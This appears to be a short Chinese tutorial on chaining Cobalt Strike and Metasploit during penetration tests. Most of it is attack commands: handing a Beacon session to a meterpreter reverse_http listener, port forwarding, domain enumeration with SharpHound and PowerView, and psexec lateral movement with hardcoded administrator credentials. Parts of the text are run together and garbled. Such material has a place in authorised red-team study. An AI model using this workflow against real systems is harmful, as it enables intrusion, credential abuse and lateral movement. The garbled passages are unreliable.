CobaltStrike和Metasploit是两个流行的渗透测试框架,它们可以相互配合使用以增强渗透测试能力。CobaltStrike擅长隐蔽持久化和团队协作,而Metasploit拥有丰富的漏洞利用模块。
metasploit
命令在CobaltStrike的Beacon控制台中:
beacon> metasploit [session_id] [LHOST] [LPORT]
示例:
beacon> metasploit 1 192.168.1.100 4444
exploit/multi/handler
模块在Metasploit中设置监听器:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 4444
exploit -j
beacon> ssh 192.168.1.100:22\administrator P@ssw0rd
beacon> rportfwd 8080 127.0.0.1 4444
然后在Metasploit中连接本地转发的端口。
mimikatz
模块获取凭证psexec
或wmi
横向移动在CobaltStrike中生成Metasploit兼容的payload:
beacon> execute-assembly /path/to/SharpHound.exe
beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Get-DomainComputer | select name
然后在Metasploit中:
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.50
set SMBUser administrator
set SMBPass P@ssw0rd
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 4444
exploit
优势: - 结合CobaltStrike的隐蔽性和Metasploit的强大利用能力 - 利用CobaltStrike的团队协作功能共享Metasploit会话 - 通过CobaltStrike的SOCKS代理进行Metasploit的内网穿透
注意事项: - 联动会增加被检测的风险 - 确保网络连接稳定 - 注意payload的兼容性 - 遵守法律和道德规范
这种联动方式可以充分发挥两个工具的优势,提高渗透测试的效率和成功率。